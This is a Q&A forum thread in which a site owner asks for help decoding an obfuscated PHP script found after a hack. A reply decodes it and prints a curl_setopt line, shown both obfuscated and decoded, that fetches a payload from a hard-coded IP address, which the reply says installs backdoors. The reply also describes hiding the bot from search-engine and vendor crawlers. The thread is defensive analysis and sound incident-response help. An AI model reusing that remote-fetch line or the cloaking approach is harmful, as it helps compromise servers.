Home/ Questions/Q 8621101
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-06-12T06:44:33+00:00

Today my sites were hacked and here is one of php scripts I found

  • 0

Today my sites were hacked and here is one of php scripts I found : https://docs.google.com/open?id=0B7aEugGV1GwTNnd2c2Fqei1vakE .

I changed eval to print in this code but I’m not able to decode the source code of the script.

I want to see what this script was doing for 1 week in my sites. I figured it out due to site denial attack from these scripts which ultimately changed the .htaccess code.

I’ve even tried to find any know common threats in Google using the script names and comment lines but I found none.

Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    Disclaimer

    After Decoding i arrived at http://pastebin.com/VGqeGDkH. Please don’t run the above code on your system … because it not the only fine that would be downloaded to your system.

    The hacker sends curl or file_get_contents request to :

    curl_setopt($vH5wU9kS8uO3wG9xI7wR5aV1fS3vU2qC2bA6yP9oG2uZ1zF7zZ5dR8gI0tJ3jV3oB0cD1iN6dD1vL8gL2uP4fX0yU2tF4bR8qD1xB2pL7eS9kW2rI7vD1dS5oA4iP9jH6, CURLOPT_URL, "$pO6oA9pF4aY2lO7dY9vK3sU7nL8lF4gL1dY7uD8mU4xH9gM2hR9gT8tA6dJ1aB9sA8wP3sO5zI8xR2eZ0aD4dK7uQ0rG7aA7nI6kZ3kI3tG5$cO9qE4hY7wW5rJ7qL1bN7uP0dE2zE9rB2bV6lY3sJ8eO3rN3pR0tA8mA0qR1oK2dE9qM3yH0kB1wU1qX2pJ0bS5xV4mG7pY1pI6iK8eP8xY3yX2$kI8yO6lP1lN7wX0fV2kY1zI9vO3mS6wK3lT9gH9rE6tZ8xT6dE7wG4dP5iJ0mC7bX0zJ3tO1iD0eD2hE4cJ0pG4gZ1bC8lT5jM1iK8hD3$tV3uB4lG2gC9iV5fE4bJ3lC6mO1sN2hE7tH0gA0iC9cT5eR4pE2aW4nA7qI5oA8uW7mZ2fE6cQ7rB9cR0xG4gY9rM9hC2rN1$tV3uB4lG2gC9iV5fE4bJ3lC6mO1sN2hE7tH0gA0iC9cT5eR4pE2aW4nA7qI5oA8uW7mZ2fE6cQ7rB9cR0xG4gY9rM9hC2rN1$fK3iD2pY6sG1xV5wB5wU8pJ1hP2qW7wZ5sI1kS4pN0pO7bD1fE1vZ2aL3pV0uZ2fI3eQ4kI9aD8wN5bF0jR8aQ8sN6rD0pV6sM4uJ7zK6aW5dR4bC7$tV3uB4lG2gC9iV5fE4bJ3lC6mO1sN2hE7tH0gA0iC9cT5eR4pE2aW4nA7qI5oA8uW7mZ2fE6cQ7rB9cR0xG4gY9rM9hC2rN1$zP3dW5gU5bS0sO7aO2cQ5tD0eV6cD9rW9sJ9jM0kO6zK8wL8hL9xU3zI1gJ7xT2rX9tO9wD6gL0pV5eD2rT4hL2uP1jB9sE2cU0fG6gJ1zM0pM2vS1wZ8lQ7uN8qA6eY0$qM2xA6eC8gQ2lE0qQ8eM7xT2dV5sS1aW2wH3qL5dG5sF3fI4zA1xG9gN9xV7fO4zT5qV2yU1gC2lR2vB1hF5dO6gC9xH6aC1wA6$zV0mR4mU2lH5iU0qI9iN1vM6eU2uO2qJ2fH4mY7wK1kH5nR0fE4yV8rI0vR3lM3zW2jK8cG3dX4zM3oQ8iK0iK7yS1fY0oE4yZ3xN7iI4sN6");

    After decoding you would get

    curl_setopt($ch, CURLOPT_URL, "http://95.211.128.197/100JS71MLKpzPzFbcYeVvZUMxCRUKBVFFx6iO6pr2VfhBthyzGcp.txt");

    This would then download files and different back door to the system ..

    The hacker also used a lot of advance methods such as encryption , variable recursion , and plenty backup .. He also made sure that the final bot was not discovered by Google , Yahoo , Microsoft Corp , AMAZON , UCSD.EDU , Indiana University , Sonic.net , MCAFEE INTERNATIONAL , and hz

    My Advice

    Contact your hosting company or a Security Professional .. Your server needs to be checked

    • 0